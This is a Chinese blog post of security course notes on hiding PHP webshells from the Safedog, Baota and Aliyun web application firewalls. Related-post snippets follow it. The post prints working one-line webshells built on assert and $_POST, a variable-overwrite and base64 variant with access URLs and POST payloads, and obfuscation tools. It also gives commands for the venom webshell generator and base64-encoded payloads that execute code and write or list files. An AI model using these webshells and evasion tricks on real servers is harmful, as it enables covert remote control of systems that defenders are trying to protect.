【WAF绕过-3】权限控制之代码混淆及行为制造轮子

已于 2022-12-21 08:46:57 修改
阅读量180 收藏 1
点赞数
分类专栏: 小迪安全笔记 文章标签: web安全
于 2022-12-20 17:23:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41889600/article/details/128385841
版权

在这里插入图片描述
Safedog代码层手写及脚本绕过
变量覆盖,加密混淆,异或生成
BT Aliyun代码层手写及脚本绕过

编码解码(变量覆盖,加密混淆,异或生成)
ASP,PHP,ASPX,JSP,PY等后门免杀同理

先绕安全狗–>安全狗加BT–>安全狗加BT加Aliyun,三者依次测试

案例1:Safedog-手写覆盖变量简易代码绕过-代码层
在这里插入图片描述

一句话木马:<?php assert($_POST['chopper']);?>

变量覆盖通过把敏感字符写到参数上,绕过WAF

<?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b($_POST['z']);
?>
 
//传参:?x=b&y=assert
//$a=b  $$a=assert=$b assert($_POST['z']);

可以绕过safedog查杀
安全狗可以代码追踪发现参数关联,将敏感字符写在参数中 实现绕过
上传成功后,
访问:http://127.0.0.1:8081/x/1.php?x=b&y=assert
并且(可以用hackbar插件)postdata:z=phpinfo();
safedog不拦截
测试,成功。

案例2:Safedog,BT,Aliyun-基于 覆盖变量 编码解码 绕过-代码层

采取覆盖变量的方式可以绕过安全狗查杀,但是会被宝塔拦截。原因是 宝塔过滤规则里定义了phpinfo()等关键字
所以可以配套 使用编码解码方式 绕过 宝塔。

一句话木马:

<?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b(base64_decode($_POST['z']));
?>

上传成功后,
访问:http://127.0.0.1:8081/x/1.php?x=b&y=assert
并且(可以用hackbar插件)postdata:z=cGhwaW5mbygpOw==
测试,成功。

案例3:Safedog-基于接口类加密混淆代码绕过-代码层

上传一句话木马:

<?php assert(base64_decode($_POST['chopper']));?>

木马文件被安全狗查杀
可以采用加密混淆的方法绕过
方法1:使用enPHP工具加密混淆代码
enPHP:一个开源加密混淆 PHP 代码项目
源码地址:https://github.com/djunny/enphp(工具已被删除)
命令:php.exe code_test.php

在线地址:http://enphp.djunny.com
加密混淆后木马:
在这里插入图片描述
方法2:phpjiami在线加密混淆

地址:https://www.phpjiami.com/phpjiami.html

木马加密前后对比:在这里插入图片描述
案例4:safedog,BT,Aliyun-基于覆盖加密变异下编码解码绕过-代码层

venom:支持生成asp、aspx、jsp、php等一句话免杀木马

下载:https://pan.baidu.com/s/1msqO2kps139NNP9ZEIAVHw 提取码:xiao
gitee地址:https://gitee.com/Dyan_code/webshell-venom?_from=gitee_search
使用方法

python3 php_venom_3.3.py    //生成免杀一句话
python3 php_venom_3.3.py shell.php   //对同目录下shell.php进行免杀处理,结果保存在shell.php.bypass.php


3.x 使用说明:
  
 是否传入id参数决定是否把流量编码
  

http://www.xxx.com/shell.php 
POST: mr6=phpinfo();  //与普通shell相同
 
http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)
POST: mr6=cGhwaW5mbygpOwo=  //payload的base64编码

案例5:Safedog,BT,Aliyun-基于冰蝎新型控制器绕过全面测试-行为层

3个工具比较:

菜刀:已经不再更新了,无插件(看举例1),单向加密传输,打5分,不建议使用。
蚁剑:持续更新状态,有插件,扩展性强,缺点是单向加密传输,打8分。
冰蝎:持续更新状态,未知插件,扩展性强,双向加密传输,偏向于后渗透,可以联动msf.,打分9分,推荐使用。
下载地址:

冰蝎:https://github.com/rebeyond/Behinder/releases/
蚁剑:https://github.com/AntSwordProject/antSword/releases
举例1:菜刀工具没有base64编码解码功能,所以就无法通过编码绕过宝塔,但是蚁剑可以
在这里插入图片描述
冰蝎原理示意图
在这里插入图片描述案例6:Safedog,BT,Aliyun-基于手写新型控制器绕过全面测试-行为层使用工具连接木马时,waf可能会通过工具的指纹实现拦截,此时我们可以采用如下方法绕过:1、指纹变异、2、自己造轮子如下

http://test.xxx.com/xx.php?x=b&y=assert
post data举例:
执行代码 z=phpinfo(); -->  z=cGhwaW5mbygpOw==
写入文件 z=file_put_contents("test.txt","1"); -->  z=ZmlsZV9wdXRfY29udGVudHMoInRlc3QudHh0IiwiMSIpOw==
读取文件 z=var_dump(scandir(".")); -->  z=dmFyX2R1bXAoc2NhbmRpcigiLiIpKTs=

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

阿福超级胖
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
权限控制WAF绕过之木马混淆免杀
m0_61506558的博客
10-03 750
当我们把有侵入性的代码写进去时,通过指纹信息,从而招到WAF的拦截,为了获取对方的控制权,通常会采取使用代码木马执行,使用shell工具连接,但是往往注入代码会被waf拦截,无法注入也就无法获取shell连接,就算绕过代码检测之后,执行的行为也可能被waf设备拦截,导致无法执行shell操作,下面从代码的注入绕过,与代码注入后执行操作绕过总方法,下面总结几种最新的绕过姿势。(一)变量覆盖我们就以为例,禁止使用简单的变量传递,大多数waf具有变量追踪,必需要引入变量覆盖传递参数。?
WAF绕过-权限控制代码混淆行为轮子
Rnan_prince的博客
08-05 297
免责声明:本内容仅为【小迪安全-web渗透测试】的学习笔记,仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。 Safedog代码层手写及脚本绕过 变量覆盖,加密混淆,异或生成 BT Aliyun代码层手写及脚本绕过 编码解码(变量覆盖,加密混淆,异或生成) ASP,PHP,ASPX,JSP,PY等后门免杀同理 http://test.xxx.com/x.php?id=x mr6=cGhwaW5mbygpOw== http://te..
WAF绕过“小迪安全课堂笔记”信息收集,漏洞发现,漏洞利用,权限控制
weixin_42902126的博客
05-04 1665
WAF绕过思维导图(全)CC 攻击与 DDOS CCWAF 绕过-信息收集之反爬虫延时代理池技术案例Safedog-默认拦截机制分析绕过-未开CCWAF绕过-漏洞发现之代理池指纹被动探针漏洞发现触发 WAF 点-针对 xray,awvs 等案例代理池代理池 Proxy_pool 项目搭建及使用解释充钱代理池直接干safedog+BT+Aliyun探针Safedog-awvs 漏扫注入测试绕过-延时,白名单BT(baota)-awvs+xray 漏扫 Payload 绕过-延时被动WAF 绕过-漏洞利用之注入
一个权限的设置,你会混淆
weixin_34405557的博客
01-08 162
实验环境; 1 创建一个schema SchemaCREATE SCHEMA [Sales] AUTHORIZATION [dbo]   2 创建两个表,一个视图,一个存储过程 [Sales].[Customer]CREATE TABLE [Sales].[Customer](    [Customer_ID] [int] NOT NULL,    [Customer_Name] [nv...
第48天:WAF绕过-权限控制代码混淆行为轮子1
08-03
WAF 绕过-权限控制代码混淆行为轮子#Safedog 代码层手写及脚本绕过变量覆盖,加密混淆,异或生成#BT Aliyun 代码层手写及脚本绕过编码解码
第47天:WAF绕过-漏洞发现之代理池指纹被动探针1
08-03
1.扫描速度-(代理池,延迟,白名单等) 2.工具指纹-(特征修改,伪造模拟真实用户等) 3.漏洞 Payload-(数据变异,数据加密,白名单等)
第46天:WAF绕过-信息收集之反爬虫延时代理池技术1
08-03
WAF 绕过-信息收集之反爬虫延时代理池技术#简要本章具体内容和安排缘由#简要本课具体内容和讲课思路#简要本课简要知识点和具体说明演示案例:Safedog-默认
WAF绕过--小马绕过
wwxxee
05-17 861
WAF绕过之小马免杀 WAF安全狗-Apache版 v4 正常的PHP一句话木马: <?php eval($_REQUEST[6]);?> 对于这个正常的一句话木马,安全狗会拦截。 关于拦截其实最主要的还是测试,看看Waf究竟怎么拦截。[最直接的检测应该是正则匹配] 我们尝试只写<?php eval();?> 发现没有拦截,但是加了REQUEST[6]就拦截了那么我们是不是可以尝试测试看看究竟拦截_REQUEST[6]就拦截了 那么我们是不是可以尝试测试看看究竟拦截R​EQUES
WAF绕过-木马混淆免杀姿势
告白的博客
08-27 860
0x00 简介 为了获取对方的控制权,通常会采取使用代码木马执行,使用shell工具连接,但是往往注入代码会被waf拦截,无法注入也就无法获取shell连接,就算绕过代码检测之后,执行的行为也可能被waf设备拦截,导致无法执行shell操作,下面从代码的注入绕过,与代码注入后执行操作绕过总方法,下面总结几种最新的绕过姿势。 常见脚本: PHP, JSP, ASP, ASPX, Pytohn… 常见shell工具:中国菜刀, 蚂蚁宝剑, 冰蝎 比较推荐使用冰蝎适合后渗透,菜刀的使用比较局限也没有更新了, 菜
第48天-WAF 绕过-权限控制代码混淆行为轮子
MCTSOG的博客
04-11 1012
思维导图 Safedog 代码层手写及脚本绕过 变量覆盖,加密混淆,异或生成 BT Aliyun 代码层手写及脚本绕过 编码解码(变量覆盖,加密混淆,异或生成) ASP,PHP,ASPX,JSP,PY 等后门免杀同理 一句话后门的原理: <?php@eval($_POST['password']) ?> @再php中含义为后面如果执行错误不会报错 eval()函数表示括号里的语句全做代码执行 $_POST[‘password’]`表示从页面中以post方式获取变量password的值。
php一句话木马免杀
最新发布
qq_58683895的博客
11-21 1837
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀
PHP之一句话木马免杀
墨痕诉清风的博客
10-07 5772
目录 免杀小技巧 1.字符串拼接方式,构造敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 <?php $a = 'assert'; $b = '_GET'; $a(.
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3186
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2398
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马的免杀。Webshell检测方式网上有很多免杀的一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
免杀学习——PHP免杀
ZxC789456302的博客
10-23 1797
php上马免杀,理论上是只要绕过waf就可以,但特殊情况下存在驻场人员手动监控,看到一些奇怪的参就直接给你ban了,所以各位师傅尽量不要在一些敏感时期进行渗透测试,仅用于技术学习推荐大家去看一下这位师傅的文章php免杀合集 - 跳跳糖 (tttang.com),里面还有一些扩展,十分详细。
绕过WAF-一句话木马
qq_30787769的博客
12-10 2604
注:本次的测试环境是最新的安全狗Apache:V4.0 一句话木马:<?php eval($_REQUEST['a'])?> 1.但是这样写容易被安全狗这些拦截,所以可以考虑替换某些函数,比如eval换成assert()或者reate_function()或者是call_user_func() 2.使用end()函数来代替,可以写成: <?php eval(end($_REQUE...
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 31万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
绕过WAF代码混淆权限控制下的行为轮子实战
在第48天的学习内容中,我们探讨了WAFWeb应用防火墙)绕过的策略,特别关注的是如何在权限控制下通过代码混淆行为层面的操作来实现这一目标。这部分技术主要针对Safedog、BTAliyun等平台,涉及到的手法包括但不...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值